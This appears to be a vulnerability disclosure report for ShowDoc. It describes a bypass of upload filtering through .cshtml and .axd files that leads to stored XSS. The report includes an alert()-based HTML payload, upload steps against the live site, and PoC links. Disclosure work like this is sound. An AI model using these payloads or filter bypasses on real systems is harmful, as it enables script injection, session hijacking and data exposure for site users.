Description

This is a bypass of the report: https://huntr.dev/bounties/3eb5a8f9-24e3-4eae-a212-070b2fbc237e/ & https://huntr.dev/bounties/6127739d-f4f2-44cd-ae3d-e3ccb7f0d7b5/. Here the upload functionality allows the malicious files with the extension .cshtml and .axd which leads to Stored XSS.

Proof of Concept

1.First, open your text file/notepad and paste the below payload and save it as New_XSS.cshtml and XSS.axd:

<html>

<script>alert(1337)</script>

<script>alert(document.domain)</script>

<script>alert(document.location)</script>

<script>alert(‘XSS_by_Samprit Das’)</script>

</html>

2.Then go to https://www.showdoc.com.cn/ and login with your account.

3.Afther that navigate to file library (https://www.showdoc.com.cn/attachment/index)

4.In the File Library page, click the Upload button and choose the New_XSS.cshtml and XSS.axd

5.After uploading the file, click on the check button to open that file in a new tab.

PoC URL

https://img.showdoc.cc/622e39769ff8d_622e39769ff86.cshtml?e=1647201129&token=-YdeH6WvESHZKz-yUzWjO-uVV6A7oVrCN3UXi48F:gy0tywgMIYI1yTi7KYfXI1PJtIE=

https://img.showdoc.cc/622e441f9f79c_622e441f9f793.axd?e=1647202922&token=-YdeH6WvESHZKz-yUzWjO-uVV6A7oVrCN3UXi48F:esQLnEOOKHWz0j9QqpI999fchtE=

Video & Image PoC

https://drive.google.com/drive/folders/1lvidM91pZBkQH3HpafrU-6wmh4Y5MLUD?usp=sharing

Impact

This allows attackers to execute malicious scripts in the user’s browser and it can lead to session hijacking, sensitive data exposure, and worse.